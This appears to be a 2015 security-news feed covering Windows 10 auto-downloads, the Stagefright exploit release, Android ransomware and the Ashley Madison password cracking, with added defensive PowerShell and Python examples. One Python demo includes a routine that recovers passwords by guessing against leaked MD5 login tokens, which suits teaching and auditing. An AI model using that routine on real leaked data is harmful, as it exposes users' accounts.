Microsoft plans to deploy Windows 10 on over 1 Billion devices worldwide, and this auto-downloading Windows 10 could be one of its many strategies to achieve its goal.
The company has dropped and saved a hidden $Windows.~BT folder on your PC's main drive (C drive), if you are running Windows 7 or Windows 8.1.
The bottom line is:
Many Windows users are on limited or metered Internet connections, and Microsoft is not only consuming storage space but also using users' Internet bandwidth for large unrequested files, as the Windows 10 installer downloads up to 6 gigabytes.
So, here are some methods that you can use to stop Microsoft from automatically downloading Windows 10 installation files.
Method 1
This method is applicable for both Windows 7 and Windows 8.1 users and specifically targets the Windows 10 download files.
Install KB3065987 (for Windows 7) or KB3065988 (for Windows 8.1) from Microsoft's official website, depending on the operating system you are using.
Now restart your computer and open the Registry Editor (search for Regedit).
Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows
Right-click "Windows", select New, then Key, and name the new key "WindowsUpdate".
Click on the newly created "WindowsUpdate" key and create a 32-bit DWORD called "DisableOSUpgrade" with a value of 1.
Restart your computer. That's it.
Method 2
Both Windows 7 and Windows 8.1 users can simply choose to disable downloading of all Windows updates.
For this you need to follow some simple steps:
Go to Windows Update
Click on Change settings
Select "Check for updates but let me choose whether to download and install them"
Once selected, Windows Update will notify you of updates, and you have to manually choose to install each and every update.
Method 3
The third method is only for Windows 8.1 users. Windows 8.1 has a setting for metered connections, but it only works for Wi‑Fi and mobile broadband networks, not for users connected with Ethernet cables.
Click on the networks icon in the bottom right
Right-click the connection you are using
Choose "Set as metered connection"
The other way is to:
Type "PC settings" into the Start Screen
Select Network
Select Connections
Now choose the connection you want to change
Turn on "Set as a metered connection" under Data usage
Either way, Windows Update will not download large updates over this connection anymore.

Microsoft is Auto-Downloading Windows 10 to PCs, Even If You Don't Want it


Microsoft wholeheartedly wants you to upgrade to Windows 10. So much so that even if you have not opted in for the Windows 10 upgrade, you will get it anyway.


If you have Windows Update enabled on your PC running Windows 7 or Windows 8.1, you'll notice a large file (between 3.5GB and 6GB) that has mysteriously been downloaded to your computer in the background.

The huge file is actually linked to Windows 10 installation that Microsoft is reportedly downloading on Windows 7 and Windows 8.1 computers even if users have not opted into the upgrade.

The news comes days after it was disclosed that Microsoft is installing Windows 10’s data collecting and user behavior tracking features onto Windows 7 and 8.1 machines.

With this latest automatic Windows 10 installation, Microsoft is not only consuming your storage space but also using your Internet bandwidth for unrequested files, as the Windows 10 installer downloads up to 6 gigabytes, depending on which Windows version you are using.

According to the latest report published by the Inquirer, a number of users running Windows 7 or 8.1 complained that a large folder called ‘$Windows.~BT’ has been dropped in their system that tries to install Windows 10 every time they boot up their PCs.

Here’s the Kicker:

Microsoft, which released its newest Windows 10 operating system earlier this summer, admitted that it was downloading the unwanted files on users’ computers.

The Redmond technology firm said in a statement:
"For individuals who have chosen to receive automatic updates through Windows Update, we help upgradable devices get ready for Windows 10 by downloading the files they’ll need if they decide to upgrade."
Now, this is insane.

Microsoft has said many times that it plans to deploy Windows 10 on over 1 billion devices worldwide, but upgrading users' computers without their awareness is bad practice.

Moreover, the practice is problematic for users with slow or metered Internet connections.

Check If Microsoft is Downloading Windows 10 without Your Awareness:
Open the drive Windows is installed on.
Look for the folder $Windows.~BT (it is a hidden folder, so enable the option to view hidden files).
If it exists, the Windows 10 installation files have already been downloaded without your permission.
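The same check, followed by the registry fix from Method 1 in the earlier article, as an added PowerShell example (not from the original articles). It assumes an elevated PowerShell prompt on Windows 7 or 8.1 and uses the KB numbers, folder name and registry value the articles give; the size report and the OS-version test are additions.

```powershell
# Added example: detect a staged Windows 10 installer and apply DisableOSUpgrade.
# Run as administrator. Uses only cmdlets available on PowerShell 2.0 (Windows 7).

$stagingFolder = Join-Path $env:SystemDrive '$Windows.~BT'   # single quotes keep the $ literal

# 1. Has the installer already been downloaded? -Force includes hidden items.
if (Test-Path -LiteralPath $stagingFolder) {
    $bytes = (Get-ChildItem -LiteralPath $stagingFolder -Recurse -Force -ErrorAction SilentlyContinue |
              Where-Object { -not $_.PSIsContainer } |
              Measure-Object -Property Length -Sum).Sum
    Write-Host ("Found {0}: about {1:N2} GB already downloaded" -f $stagingFolder, ($bytes / 1GB))
} else {
    Write-Host "No $stagingFolder folder found; the installer has not been staged (yet)."
}

# 2. Method 1 requires the matching update to be installed first; the policy
#    value is only honoured once that update is present.
$osVersion  = (Get-WmiObject Win32_OperatingSystem).Version     # 6.1.x = Windows 7, 6.3.x = Windows 8.1
$requiredKb = if ($osVersion -like '6.1.*') { 'KB3065987' } else { 'KB3065988' }
if (-not (Get-HotFix -Id $requiredKb -ErrorAction SilentlyContinue)) {
    Write-Warning "$requiredKb is not installed. Install it via Windows Update, reboot, then re-run this script."
    return
}

# 3. Create the policy key (same as New > Key in Regedit) and the 32-bit DWORD.
$policyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate'
if (-not (Test-Path $policyKey)) { New-Item -Path $policyKey -Force | Out-Null }
New-ItemProperty -Path $policyKey -Name 'DisableOSUpgrade' -PropertyType DWord -Value 1 -Force | Out-Null

# 4. Read the value back so the change is verified before the reboot.
$value = (Get-ItemProperty -Path $policyKey -Name 'DisableOSUpgrade').DisableOSUpgrade
Write-Host "DisableOSUpgrade = $value (restart the computer to apply)"
```

The existing $Windows.~BT folder is only reported, not deleted; remove it with Disk Cleanup once the policy is in place.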



Researchers recently discovered a smattering of vulnerabilities in web applications and mobile applications belonging to companies like Yahoo, PayPal, Magento, and Shopify that could have led to account theft, session hijacking, and phishing, among other consequences.

Hadji Samir, Ebrahim Hegazy, Ayoub Ait Elmokhtar, and Benjamin Kunz Mejri, researchers with Vulnerability Lab, found the bugs earlier this year but only recently disclosed them.
The researchers found three separate issues in web apps developed by PayPal, including a severe vulnerability that could have let an attacker bypass a verification check meant to approve the account owner. Mejri discovered that even if two-factor authentication was enabled on the app, a user who attempted to log in with the wrong credentials and got blocked could still get into their account. In a writeup on the vulnerability last week, Mejri said that a user could access another user's account via the mobile API simply by swapping out expired cookies for legitimate ones.

On top of the two factor authentication bypass bug, PayPal also recently patched an open redirect web vulnerability, discovered by Elmokhtar, that could’ve been exploited remotely. It also addressed a stored cross-site scripting vulnerability in its Online Service Web Application back in August, found by Hegazy, that could’ve been exploited to purchase goods or transfer funds.

Another issue the researchers brought up existed in Gemini, Yahoo’s marketplace for mobile and native ads. If exploited the Cross Site Request Forgery (CSRF) bug could have enabled an attacker to inject malicious code to compromise client-side app to browser requests, along with session data.

Lastly the researchers disclosed two different persistent file name vulnerabilities in two e-commerce platforms, one in the eBay-owned Magento, and one in Shopify.

Both vulnerabilities, since fixed, could have let a remote attacker upload their own malicious files to the application-sides of the service modules. If compromised, they could lead to a handful of issues for both apps, including session hijacking, persistent phishing attacks, persistent redirects to external malicious sources, and more.

It’s the seventh bug in Magento that Samir has dug up this year. In June he came across three issues, a CSRF vulnerability, a XSS bug, and a different persistent filename vulnerability in the company’s e-commerce platform.

Ironically the most recent vulnerability Samir found was in the module on Magento’s site in charge of reporting bugs. Instead of reporting a bug, if an attacker wanted to upload a file with a payload script code as a filename via POST, the payload code would execute.

Eset brings easier management of security solutions

11.9.2015 Security
The manufacturer has released a service release of its Remote Administrator 6 product, intended for remote management of installed Eset security solutions.

The tool has a number of new features and improvements, one of the main novelties being the option to use two-factor authentication for access to the web console.

Besides the introduction of two-factor authentication for logging into the console, the most important new features of Remote Administrator are a new initial-setup wizard, support for the new version of Mail Security 6 for Microsoft Exchange Server, a native SysInspector log viewer and a migration tool for transferring policies from previous versions.

Improvements include, for example, enhanced threat management, an All-in-one installer with more options for installation and uninstallation, and a number of improvements to the web console's user interface. The console is also faster overall and more responsive.

"Two-factor security for the Remote Administrator web console makes it possible to protect the user accounts of up to ten administrators free of charge. It is an optional feature that significantly strengthens overall IT security in an organisation," adds Michal Jankech, product manager at Eset.

Android Stagefright Exploit Code Released


Zimperium Mobile Security Labs (zLabs) have been working hard to make the Android operating system safer and more secure to use.

Zimperium team has publicly released the CVE-2015-1538 Stagefright Exploit, demonstrating the process of Remote Code Execution (RCE) by an attacker.

The released exploit is Python code that creates an MP4 file exploiting the 'stsc' vulnerability, dubbed Stagefright.

The purpose behind the release is to let penetration testers and security researchers test their devices for the vulnerability and analyze the results.

Considered the most critical of all the existing vulnerabilities, the Stagefright flaw can expose a user's information remotely by injecting malicious code, without any involvement of the user.

Two months ago, Zimperium Labs uncovered multiple vulnerabilities in ‘libstagefright,’ a service attached with the software-based codecs natively in Android smartphones for media playback.

The vulnerability allowed booby-trapped MP4 videos that supplied variables with 64-bit lengths to overflow the buffer and crash the smartphone when trying to open that multimedia message.

The list of vulnerabilities extends to:
CVE-2015-1538, P0006, Google Stagefright ‘stsc’ MP4 Atom Integer Overflow Remote Code Execution
CVE-2015-1538, P0004, Google Stagefright ‘ctts’ MP4 Atom Integer Overflow Remote Code Execution
CVE-2015-1538, P0004, Google Stagefright ‘stts’ MP4 Atom Integer Overflow Remote Code Execution
CVE-2015-1538, P0004, Google Stagefright ‘stss’ MP4 Atom Integer Overflow Remote Code Execution
CVE-2015-1539, P0007, Google Stagefright ‘esds’ MP4 Atom Integer Underflow Remote Code Execution
CVE-2015-3827, P0008, Google Stagefright ‘covr’ MP4 Atom Integer Underflow Remote Code Execution
CVE-2015-3826, P0009, Google Stagefright 3GPP Metadata Buffer Overread
CVE-2015-3828, P0010, Google Stagefright 3GPP Integer Underflow Remote Code Execution
CVE-2015-3824, P0011, Google Stagefright ‘tx3g’ MP4 Atom Integer Overflow Remote Code Execution
CVE-2015-3829, P0012, Google Stagefright ‘covr’ MP4 Atom Integer Overflow Remote Code Execution
The vulnerability affected Android operating system versions from 2.2 (Froyo) up to, but not including, version 5.1.1_r9 (Lollipop).

To access the exploit go to (raw file) explaining the conditions that come along and everything you need to know.

For further details, visit the US-CERT/CC advisory, where the details of the announcement are posted.

Health Insurer Excellus Hacked; 10.5 Million Records Breached


Health Care Hacks — the choice of hackers this year!

In a delayed revelation, Excellus BlueCross BlueShield (BCBS) says that the data and information of about 10.5 million of its clients has been compromised by hackers.

Excellus BCBS, headquartered in Rochester, New York, provides financial and health care services across upstate New York and long-term care insurance nationwide.

On August 5, 2015, Excellus BCBS discovered that hackers had targeted its IT systems back in December 2013, initiating a sophisticated attack to gain access to its systems and to clients' personal data.

The Compromised Data includes:
Social Security Number (SSN)
Date of birth
Mailing address
Telephone number
Member identification number
Financial account information
Claims information
Did they forget something?...It seems everything is gone!

Moreover, Excellus systems were open to the hackers for two years. So what was the company doing all this time?

Excellus BlueCross BlueShield in their statement said:
"This incident also affected members of other Blue Cross Blue Shield plans who sought treatment in the 31 county upstate New York service area of Excellus BCBS. Individuals who do business with us and provided us with their financial account information or Social Security number are also affected."
The company has hired Mandiant Incident Response Team of FireEye Inc to help investigate the matter and to bring its systems back to normal by providing adequate remediation solutions.

However, the investigation has so far gathered no evidence of removal, use or misuse of the compromised data.

Further, to protect customers' valuable data, the company expressed concern for affected customers and said that it is going to:
Mail letters to its customers to let them know the facts and how they can secure their identity in future.
Offer two years of free identity theft protection services and credit monitoring to affected individuals.
Moreover, others who are worried about their security can contact Excellus on 1-877-589-3331 (toll-free) to learn about the incident.

At the start of this year, cyber attack victims in health care were:
Anthem Healthcare, with a data breach of 80 million (the largest of all)
Premera, with the personal data of approximately 11 million users stolen
UCLA Health System, with 4.5 million records leaked, leading to identity theft
CareFirst, affecting approximately 1.1 million customers
All the above companies were using BlueCross BlueShield insurance plans except UCLA health system.

Also, we need to think that for what purpose the hackers are going to use this bulk information...or is it the calm before the storm?

If we notice, vendors running BCBS plans are the ones mostly affected by this data breach.

So is the BCBS Association the target of the hackers, given that one after another its vendors offering insurance services are falling victim to such massive data breaches?

This indeed makes us think of the potential of not only the cyber attacks and security but also the current threats to health care and associated bio-medical devices.

Hacker Demonstrated Untethered iOS 9 Jailbreak On Video


Just within 24 Hours after the launch of iOS 9 at Apple's Annual Event, a well-known iOS hacker has managed to untether jailbreak iOS 9. That's quite impressive.

Believe it, iOS 9 has been Jailbroken!

A well-known hacker, 'iH8sn0w', who previously developed the popular jailbreak tools Sn0wbreeze and P0sixspwn, published a new YouTube video last night demonstrating the first untethered jailbreak for the yet-unreleased iOS 9.

Apple plans to publicly release its latest iOS 9 software update for all supported devices on 16th September while the company has already made the Gold Master seed of the software available to developers.

Untethered Jailbreak for iOS 9

iH8sn0w has jailbroken his iPhone 5 running the iOS 9 GM seed.

The jailbreak is untethered – a jailbreak where your device does not need to be connected to an external device capable of executing commands on it every time it reboots.

You can watch the full jailbreak video below. The video demonstrates the iOS 9 jailbreak, including Verbose booting, code injection, custom boot logos, and Cydia.

iH8sn0w claimed that his method also works with the iOS 9.1 beta, though it is not shown in the video.

Both iOS 9 Gold Master (Build 13a340) and iOS 9.1 beta 1 (Build 13B5110e) versions can be downloaded from Apple's Developer Center.

iH8sn0w says he does not have any plans to release his jailbreak software, but since iOS 9 can be jailbroken, it is possible for other developers, like the Pangu and TaiG teams, to build and release an untethered iOS 9 jailbreak after the release.

The first regular Android security updates are arriving

11.9.2015 Mobile
Google is the first to fulfil the promise of regular Android security updates -- Nexus owners can start downloading. Samsung, LG and other manufacturers will hopefully follow soon.

Stagefright recently frightened Android users like no other threat has for a long time. A hole in the system Media Library allowed attackers to get malicious code onto a device simply by sending an MMS.

Fortunately, more effective defence tools in newer Android versions reduced the risk of the threat; nevertheless, Stagefright showed where the system stands on security and prompted both Google itself and third-party developers to make sure they supply users with regular security updates.

In response to the Stagefright threat, Google, Samsung and LG released such updates at least for their most widespread devices and promised monthly updates for the others too. That was thirty-six days ago.

Today Google released the first of these monthly batches for Nexus owners, specifically for the Nexus 4, 5, 6, 7, 9 and 10, so an Android 5.1.1 build designated LMY48M is available, as well as LMY48N for the Nexus Player TV device.

The developers at Android Police have added a changelog, which contains several security bug fixes, including the one for the bug that allowed applications to bypass the SMS warning code alerting users before certain services are charged for.

Google, it seems, has honoured its commitments, but what about the others? Getting security updates to users should be the responsibility of every manufacturer, ideally in cooperation with the carrier. All the more so when every phone model requires a specific update.

At least at some companies, however, things have started moving: T-Mobile has released updates for five Nexus models and for the Samsung Galaxy S6 and Note5, and those for the LG G4 should follow soon.

Majitelé Nexusů vyráběných přímo pro Google, na nichž se Android navíc vyvíjí, můžou počítat s tím, že aktualizace – a tedy vyšší bezpečnost – budou mít k dispozici dřív. Jak moc dřív, se ještě uvidí. Stejně jako, kdy začnou reagovat i další výrobci jako jsou HTC, Motorola nebo Sony, respektive další operátoři Vodafone či O2.

Android ransomware masquerades as Adult Player app, takes photo of victim
A new mobile ransomware variant uses a clever new technique to push affected users to pay the asked-for ransom: it takes a photo of the user with the phone's front-facing camera, and inserts that photo in the ransom message.

The malware, posing as a porn app dubbed "Adult Player", lurks on third party app markets. When a user downloads and installs it (and gives it admin rights), the app shows a screen that says that an update is in progress.

What is really happening is that Adult Finder downloads another APK, which takes the picture of the user, collects information about the device, and sends it to one of its C&C servers whose domains are hard-coded in the app.

The server returns a personalized ransom message to the app, which then shows it to the user, while simultaneously locking the phone. There is no picture in this message because the researchers made sure the app couldn't take one while they were testing it out:

As you can see, the message contains some information about the device, its (and the user's) IP address, and tries to make the victim think that the FBI is somehow involved.

The victim is asked to pay a $500 ransom via PayPal in order for the device to be unblocked.

Fortunately, users can unblock the device themselves, by booting it into safe mode (the process differs between devices), revoking the app's admin privileges (Settings > Security > Device Administrator > select the app and deactivate it), and then uninstalling it (Settings > Apps > Uninstall the app).

“Ransomware and crypto malware, such as that imposed by pornographic app ‘Adult Player’, is rising at an alarming rate. Intel Security’s most recent Threats Report uncovered that ransomware shot up 127% in the past year alone,” commented Raj Samani, CTO EMEA Intel Security.

In fact, Zscaler researchers have spotted additional apps belonging to this ransomware family and exhibiting similar functionality.

"We are increasingly seeing hackers blackmailing online users with their most private and sensitive information, or even photos," noted Samani. "Thanks to the pseudo-anonymity provided by digital currencies such as Bitcoin, hackers can simply buy the skills required to launch an attack online and accept ransom payment through the same technology. This makes ransomware and crypto malware a lucrative enterprise for online criminals – with successful attackers raking in tens of thousands worth of Bitcoin in matter of weeks.”

New Android malware could inflict $250,000 of losses
Bitdefender has uncovered CAPTCHA-bypassing Android malware, purposefully left in Google Play apps by unscrupulous developers, with the aim of subscribing thousands of users to premium-rate services.

If each victim is subscribed to at least one premium-rate number that charges a minimum $0.5 per SMS each month, the total financial losses from this Android-based malware could amount to $250,000.

The Trojan's sophistication lies in its ability to bypass CAPTCHA authentication systems by redirecting these requests to, an online image-to-text recognition service. relies on actual individuals to recognize CAPTCHA images, which makes it easy for requests to return to the malware in seconds because it mistakenly thinks there is human interaction. The malware then processes the covert subscription.

When conducting its own research, Bitdefender was already monitoring malware-like behavior and found that recent versions had stopped using the highly advanced packer (which had made them easier to detect) but still used obfuscated strings.

“Among the Google Play apps that disseminate the trojan, two have between 100,000 and 500,000 installs each, which is a staggering potential victim count,” said Catalin Cosoi, Chief Security Strategist at Bitdefender. “Our research confirmed that these have been weaponised for a while, with one app going back at least five iterations and having been regularly updated.”

“The malware has been built with covert capabilities to operate silently on the victim’s Android device,” Catalin Cosoi continued. “A mobile security solution is the only way to identify malicious apps, regardless of where they were downloaded, and stop threats from causing financial harm or personal data loss.”

Known as Android.Trojan.MKero.A, the malware was first spotted in late 2014, but was only distributed via third-party marketplaces or local popular social networks in Eastern Europe. Russia was one of the most affected countries.

At least one developer, Like Gaming, is publishing more than one of these malicious apps, which is the malware’s first occurrence in the official Google Play store. Developers have found new ways of packing it into seemingly legitimate apps that can bypass Google’s vetting system, Google Bouncer.

PIN-changing, screen-locking Android ransomware
A sophisticated new piece of ransomware targeting Android users and locking them out of their devices by changing the PIN has been discovered by ESET researchers.

Masquerading as an app for viewing adult videos called "Porn Droid", the LockerPin Trojan lurks on third party markets, warez forums and torrents. So far, the great majority of infected users are located in the US.

When users download and install the malicious app, the Trojan tricks them into giving it Device Administrator privileges by pretending it has to download and install an update/patch for the app.

"As the victims click through this innocuous-looking installation they also unknowingly activate the Device Administrator privileges in the hidden underlying window," the researchers explained.

The Trojan is now free to lock the device and reset the PIN for the lock screen. It then shows a message, supposedly by the FBI, which asks victims to pay a $500 fine in order to regain access to the device, and warns them against attempting to unlock the device themselves:

This Trojan also employs some very clever protections against it being detected and uninstalled.

"When users attempt to deactivate Device Admin for the malware, they will fail because the Trojan will have registered a call-back function to reactivate the privileges when removal is attempted," the researchers pointed out.

"Similarly to when Device Administrator is first activated by the Trojan, if a removal attempt is made the Device Administrator window is again overlaid with a bogus window. Pressing Continue effectively reactivates the elevated privileges."

Like many types of PC malware before it, LockerPin tries to stop mobile AV solutions from working.

According to the researchers, paying the ransom in this particular case will not get the victims anywhere, because after the reset, the new PIN is chosen at random, and the attackers do not know it.

"The only way to remove the PIN lock screen without a factory reset is when the device is rooted or has an MDM solution capable of resetting the PIN installed. If the device is rooted then the user can connect to the device by ADB and remove the file where the PIN is stored. For this to work, the device needs to have debugging enabled, otherwise it’s not possible (Settings -> Developer options -> USB Debugging)," they shared.

For instructions on how to do that, check out this blog post.
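Both ransomware families described above (Adult Player and LockerPin) depend on holding Device Administrator rights, so listing the active admins is the first triage step on a suspect device. The following is an added example, not code from the articles or from the researchers they cite: it parses `dumpsys device_policy` output and flags admins outside a known allowlist. The sample output is constructed and only approximates the real format, and the allowlist is illustrative.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Set

# Constructed sample, approximating `adb shell dumpsys device_policy` output.
SAMPLE_DUMPSYS = """\
Current Device Policy Manager state:
  Enabled Device Admins (User 0, provisioningState: 0):
    com.google.android.gms/.auth.managed.admin.DeviceAdminReceiver:
      uid=10018
      testOnlyAdmin=false
      policies:
        wipe-data
        reset-password
      passwordQuality=0
    com.example.adultplayer/.MainReceiver:
      uid=10231
      testOnlyAdmin=false
      policies:
        force-lock
        wipe-data
        reset-password
      passwordQuality=0
"""

# Illustrative allowlist of packages expected to hold admin rights on this fleet.
KNOWN_ADMINS: Set[str] = {"com.google.android.gms", "com.android.managedprovisioning"}

# Policies the two families need: lock the screen, change the PIN, and (as
# leverage) wipe the device.
HIGH_RISK_POLICIES = {"force-lock", "reset-password", "wipe-data"}

ADMIN_RE = re.compile(r"([\w.]+)/([\w.$]+):")
POLICY_RE = re.compile(r"[a-z][a-z-]*")


@dataclass
class DeviceAdmin:
    package: str
    receiver: str
    uid: Optional[int] = None
    policies: List[str] = field(default_factory=list)


def parse_device_admins(text: str) -> List[DeviceAdmin]:
    """Extract each enabled admin component, its uid and the policies it holds."""
    admins: List[DeviceAdmin] = []
    current: Optional[DeviceAdmin] = None
    in_policies = False
    for raw in text.splitlines():
        line = raw.strip()
        match = ADMIN_RE.fullmatch(line)
        if match:
            current = DeviceAdmin(package=match.group(1), receiver=match.group(2))
            admins.append(current)
            in_policies = False
        elif current is None:
            continue  # still in the header lines
        elif line.startswith("uid="):
            current.uid = int(line[4:])
            in_policies = False
        elif line == "policies:":
            in_policies = True
        elif in_policies and POLICY_RE.fullmatch(line):
            current.policies.append(line)
        else:
            in_policies = False  # any other key=value line ends the policy list
    return admins


def suspicious_admins(admins, allowlist=KNOWN_ADMINS):
    """Admins not on the allowlist that hold at least one high-risk policy."""
    return [a for a in admins
            if a.package not in allowlist and HIGH_RISK_POLICIES & set(a.policies)]


def triage_report(admins, allowlist=KNOWN_ADMINS) -> List[str]:
    """One line per finding, ending with the manual remediation the articles describe."""
    return [
        f"{a.package} ({a.receiver}, uid {a.uid}) holds {', '.join(sorted(a.policies))}: "
        "boot to safe mode, deactivate it under Settings > Security > Device "
        "Administrator, then uninstall it under Settings > Apps"
        for a in suspicious_admins(admins, allowlist)
    ]


if __name__ == "__main__":
    for finding in triage_report(parse_device_admins(SAMPLE_DUMPSYS)):
        print(finding)
```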

11 Million Ashley Madison Passwords Cracked In Just 10 Days


Last month, when hackers leaked nearly 100 gigabytes of sensitive data belonging to the popular online casual-sex and marriage-affair website 'Ashley Madison', there was at least one thing in favor of the 37 million cheaters: their passwords were encrypted.

But the never-ending saga of the Ashley Madison hack could now hit the cheaters hard, because a password-cracking group calling itself CynoSure Prime has cracked more than 11 million user passwords in just the past 10 days, not years.

Yes, the hashed passwords that were previously thought to be cryptographically protected using Bcrypt have now been cracked successfully.

Bcrypt is a deliberately slow password-hashing algorithm; at its cost, brute-forcing all of the Ashley Madison account passwords would literally take centuries.

How do they Crack Passwords?

The Password cracking team identified a weakness after reviewing the leaked data, which included users' hashed passwords, executive e-mails and website source code.

During the audit and analysis of the website's source code, the team found that some of the login session tokens used by the website were protected using MD5 (a weak and fast hashing algorithm).

So, instead of attacking the slow Bcrypt hashes, they simply brute-forced the MD5 session tokens of the respective accounts, which allowed the password-cracking team to obtain 11.2 million passwords in plaintext.

However, this approach doesn't allow them to crack all 37 million Ashley Madison passwords, because the notoriously weak MD5 hashing was only introduced in June 2012.

Therefore, researchers estimated that nearly 15 million Ashley Madison accounts could be affected, out of which 11.4 Million are already cracked by the team’s password-cracking software.
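The structural flaw described above, as an added example (not the cracking team's code nor the site's source): a password stored with a slow salted KDF sitting next to a login token derived from the same password with unsalted MD5. PBKDF2-HMAC from the standard library stands in for bcrypt, and the token construction and candidate list are hypothetical.

```python
import hashlib
import hmac
import os
import secrets
import time
from typing import Iterable, Optional, Tuple

# Stand-in cost factor; bcrypt's work factor plays the same role (assumption:
# bcrypt itself is not available offline, so PBKDF2-HMAC-SHA256 is used instead).
PBKDF2_ROUNDS = 100_000


def store_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """The right way: random per-user salt plus a slow KDF."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt, digest


def verify_password(password: str, salt: bytes, digest: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate, digest)


def weak_login_token(username: str, password: str) -> str:
    """The flaw: a 'session token' that is just an unsalted fast hash of the
    username and password (hypothetical construction, not the site's real one)."""
    return hashlib.md5(f"{username}:{password}".encode()).hexdigest()


def password_from_weak_token(username: str, token: str,
                             candidates: Iterable[str]) -> Optional[str]:
    """Audit check: does any candidate reproduce a leaked token? Each probe costs
    one MD5, so the slow KDF protecting the password hash never enters the picture."""
    for cand in candidates:
        if hmac.compare_digest(weak_login_token(username, cand), token):
            return cand
    return None


def safe_login_token() -> str:
    """The fix: a token that is random and carries no information about the password."""
    return secrets.token_urlsafe(32)


def cost_ratio(fast_probes: int = 5000, slow_probes: int = 2) -> float:
    """How many times more expensive one KDF guess is than one MD5 token guess."""
    t0 = time.perf_counter()
    for i in range(fast_probes):
        weak_login_token("alice", f"guess{i}")
    fast = (time.perf_counter() - t0) / fast_probes
    salt = os.urandom(16)
    t0 = time.perf_counter()
    for i in range(slow_probes):
        hashlib.pbkdf2_hmac("sha256", f"guess{i}".encode(), salt, PBKDF2_ROUNDS)
    slow = (time.perf_counter() - t0) / slow_probes
    return slow / max(fast, 1e-9)


if __name__ == "__main__":
    salt, digest = store_password("hunter2!")
    leaked = weak_login_token("alice", "hunter2!")
    print("KDF verify:", verify_password("hunter2!", salt, digest))
    print("recovered via token:", password_from_weak_token("alice", leaked, ["123456", "hunter2!"]))
    print(f"one KDF guess costs ~{cost_ratio():.0f}x one MD5 guess")
```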

Change Your Ashley Madison Password Now!

Researchers also said they hope to crack the remaining 4 million improperly secured account passwords within the next 7-8 days.

Ashley Madison users are advised to change their account passwords if they haven't already changed them.

Moreover, users should follow some standard precautions, such as:
Do not use the same login credentials on other websites, like eBay or PayPal, as hackers could break into that account using the cracked password and the already dumped email addresses.
Use strong and different passwords on different sites.
Use a good and reputed "Password Manager" to manage all your passwords.

Security Sandboxes Challenged by Evolving Malware


Security sandboxes are a crucial tool in the battle against the constantly evolving efforts of malware writers. Suspicious files can be placed in a digital sandbox, in which security can watch, look, and listen to determine what the code does, whom it communicates with, and if it plays nice as expected. This helps determine if a file is benign or malicious. The sandbox itself is a façade, designed to look and feel like a vulnerable system, yet in reality it is an isolated laboratory that is reinforced to allow malicious files to execute but not cause any real damage. It is all under the control and watchful eye of the security tool set. After analysis is complete, the entire digital sandbox is deleted, with any potentially harmful activities and changes disappearing with it.
Many security vendors incorporate this technology to conduct analysis of downloads, executables, and even software updates to prosecute the malicious or allow good files to flow. Similar tools are employed by forensic experts to dissect malware and unravel the inner workings. The stratagem has proven worthwhile at confidently detecting dangerous code. So much so that malware writers began embedding features into their software to detect when they have been put in a sandbox. In order to remain elusive, upon detection the code either goes silent, temporarily acts innocently, or takes the preemptive measure of deleting itself, in hopes of avoiding being scrutinized by security researchers.
Security vendors have responded by making sandboxes stealthier, to avoid detection and let malware show its true nature in a safe environment. This hide-and-seek game has escalated, with new features employed on both sides to remain undetected while attempting to discover the counterpart.
In most instances it is a passive contest. That is, until Rombertik. Given the adversarial nature of the industry, nothing stays secure forever, not even security tools. Rombertik takes a different approach and goes on the offensive to cause harm, imposing a discouraging cost on those employing security tools.


Our security colleagues at Cisco have done a great job highlighting the antisandbox advances of the Rombertik malware in the Cisco 2015 Midyear Security Report. They show how the creators of Rombertik have taken a divergent path from their more docile predecessors. Instead of being passive and self-deleting or remaining quiet, it lashes out at the very systems attempting to analyze it. Rombertik contains a number of mechanisms to undermine, overflow, and detect sandboxes. Once Rombertik believes it is under the microscope, it attacks. The malware attempts to overwrite the machine’s master boot record or destroy all files in the user’s home folder, with the goal of making the system inoperable after rebooting.
The Cisco report states “Rombertik may be a harbinger of what’s to come in the malware world, because malware authors are quick to adopt their colleagues’ successful tactics.” It is an insightful report and I strongly recommend reading it.
The idea of a safe area to test suspicious code is not new. The original sandbox was simply an extra PC that could be isolated and completely wiped after the analysis. But that was not a very scalable or terribly efficient practice. The revolution really came when software could create virtual sandboxes as needed. Such environments are quick to create, easy to configure, and simple to delete and start anew. Dozens or even hundreds could be created and be running simultaneously, each testing for malware. But software has some inherent security limitations. Malware can sometimes break out of “jail” and escape the protected sandbox to cause real harm. Plus, the most sophisticated attackers can actually turn the tables to get under the virtual environment—running the security environment in a sandbox managed by the attacker!
This maneuvering gets more complex over time as both sides escalate their tactics through innovation. How much longer can software-created sandboxes remain one step ahead? Nobody is sure.
What we need is a more robust means of building improved sandboxes. Beneath software resides the hardware, which has the advantage of being the lowest part of the stack. You cannot get “under” the hardware and it is much more difficult to compromise than operating systems, applications, and data, which run above. Hardware advances may revolutionize the game with better sandboxes that are more difficult to detect and undermine. I think time will tell, but the move to hardware seems to be where the battle is heading. What cannot be foretold is if changes in hardware will be the winning salvo or just a new battlefield for the attackers and defenders in the war of cybersecurity.

Valasek: Today’s Furby Bug is Tomorrow’s SCADA Vulnerability


CAMBRIDGE, Mass. – Chris Valasek and Charlie Miller’s car hacking research put a crunching reality on Internet of Things security, moving it beyond almost clichéd discussions of smart refrigerators leaking inconsequential data, to hackers remotely manipulating car brakes.

But Furby hacking matters too.

Valasek made it clear today during a keynote at the Security of Things forum here Thursday that the connectivity of things is a great unknown, and that today’s low-impact vulnerability in a processor, connector or CAN bus, is tomorrow’s high-impact issue inside a power plant or the brains of a Jeep Cherokee. His favorite example of some low-impact research involved work done by Azimuth Security’s Michael Coppola, a recent Northeastern University graduate, who reverse-engineered a Furby, a popular child’s toy from the 1990s. Coppola discovered vulnerabilities in the way the toy communicates with other Furby toys and its mobile app.

“We did high-impact car hacking research over a cell network that instituted a massive recall,” Valasek said. “But low-impact research cannot be dismissed either. Not every IOT vulnerability is going to be high impact. You have to judge how technology that might be vulnerable today will be used in the future.

“There are processors and communications channels everywhere, and purchasers buy these things in bulk,” Valasek said. “Something that does communications in a Furby may be in a SCADA system as well. Don’t dismiss small things that could have a high impact.”

